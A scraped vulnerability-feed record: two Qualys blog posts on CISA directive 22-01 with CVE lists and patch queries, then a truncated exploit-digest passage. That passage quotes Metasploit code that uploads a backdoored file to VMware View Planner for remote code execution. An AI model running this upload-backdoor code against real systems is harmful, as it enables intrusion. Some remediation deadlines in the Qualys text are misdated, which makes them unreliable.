cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "Welcome to our weekly exploit digest! We should say this hasn&#x27;t been a big week because guys keep producing exploits for the vulnerabilities discovered in the 1st half of March. Nevertheless, we have some new good arrivals for VMware, MS Windows and Win32 to talk about. \n\n### New 4+ scored exploits have arrived for 7 software titles:\n\n * VMware View Planner (v4.6)\n * Win32k ConsoleControl\n * Microsoft Exchange 2019\n * Microsoft Windows Containers DP API\n * SonLogger (v4.2.3.3)\n * LiveZilla Server (v8.0.1.0)\n * CuteNews (v2.1.2)\n\n### Here are the types of new exploiting tools:\n\nFile upload| 2 \n---|--- \nRCE| 1 \nOffset Confusion| 1 \nCryptography Flaw| 1 \nSSRF| 1 \nXSS| 1 \n \n## And the title winners of the week are: \n\n## \n\n## I. The Vicious One\n\n### The title goes to this angry piece of code:\n\n[**VMware View Planner 4.6 Remote Code Execution**](<https://vulners.com/packetstorm/PACKETSTORM:161879>)\n\n[CVE-2021-21978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21978>) \n**Score: CVSS 7.5** \n**Metasploit +**\n \n \n The versions of VMWare View Planner prior to 4.6 Security Patch 1 contain a remote code execution vulnerability (RCE). \n\nThis module exploits an unauthenticated log file upload within the `log_upload_wsgi.py` file, where an unauthorized attacker with network access to View Planner Harness could upload and execute an arbitrary file in the `logupload` web application.\n \n \n def upload_file(content) \n mime = Rex::MIME::Message.new \n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\";filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \n mime.add_part('{\"itrLogPath\":\"/etc/http/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \n res = send_request_cgi( \n 'method' => 'POST', \n 'uri' => normalize_uri(target_uri.path, 'logupload'), \n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n 'data' => mime.to_s \n ) \n ...\n \n\nSuccessful exploitation of this vulnerability can result in RCE as the apache user inside the `apacheServer` Docker container. Let&#x27;s look how it&#x27;s realized.\n\nFirst grab the template file from a clean install with a backdoor section added to it. Then fill in the PAYLOAD placeholder with the payload to execute. \n \n \n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded \n\nWhen the things are primed, upload the file to the target.\n \n \n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor 